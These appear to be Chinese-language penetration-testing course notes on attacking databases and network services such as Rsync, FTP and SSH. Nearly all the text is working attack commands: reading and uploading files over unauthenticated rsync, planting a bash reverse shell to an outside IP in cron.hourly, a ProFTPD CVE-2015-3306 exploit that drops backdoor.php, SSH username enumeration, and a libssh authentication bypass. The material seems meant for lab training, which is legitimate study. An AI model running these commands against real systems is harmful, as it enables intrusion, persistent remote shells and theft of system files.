一、数据库安全&Redis&Hadoop&Mysql&未授权访问&RCE
二、数据库安全&H2&Elasticsearch&CouchDB&Influxdb
常见服务应用的安全测试:
1、配置不当-未授权访问
2、安全机制-特定安全漏洞
3、安全机制-弱口令爆破攻击
Influxdb:该数据库用于存储高时序的数据,应用于监控或者Iot。默认端口号:8086
三、应用协议&Rsync&SSH&RDP&FTP&漏洞批扫&口令猜解
#配置不当-未授权访问-Rsync文件备份
rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。
判断:rsync rsync://123.58.236.76:45854/
利用:
-读取文件:rsync rsync://123.58.236.76:45854/src/
-下载文件:rsync rsync://123.58.236.76:45854/src/etc/passwd ./
-上传文件:rsync -av passwd rsync://123.58.236.76:45854/src/tmp/passwd
反弹shell:
1、获取信息:
rsync rsync://123.58.236.76:12177/src/etc/crontab /root/cron.txt
2.创建文件
touch shell
#!/bin/bash
/bin/bash -i >& /dev/tcp/47.94.236.117/5566 0>&1
chmod +x shell
3、上传文件
rsync -av shell rsync://123.58.236.76:12177/src/etc/cron.hourly
4、等待接受反弹
#高端课程-直接搜哈-MSF&Fofaviewer
https://github.com/wgpsec/fofa_viewer
msfconsole
use auxiliary/scanner/rsync/modules_list
set rhosts file:/root/ips.txt
set threads 10
run
#协议漏洞-应用软件-FTP&Proftpd搭建
https://github.com/t0kx/exploit-CVE-2015-3306
python exploit.py –host 123.58.236.76 –port 24967 –path “/var/www/html/”
http://123.58.236.76:19758/backdoor.php?cmd=id
#协议漏洞-应用软件-SSH&libssh&Openssh
-Openssh CVE-2014-0160 CVE-2018-15473 cve_2020_15778
CVE-2014-0160 版本很少
cve_2020_15778 价值不高
CVE-2018-15473-用户名枚举
https://github.com/Rhynorater/CVE-2018-15473-Exploit
pip3 install -r requirements.txt
pip3 install paramiko==2.4.1
python sshUsernameEnumExploit.py –port 32013 –userList exampleInput.txt 123.58.236.76
-libssh 身份验证绕过(CVE-2018-10933)
https://www.seebug.org/vuldb/ssvid-97614
python libssh.py 123.58.236.76 55190 “id”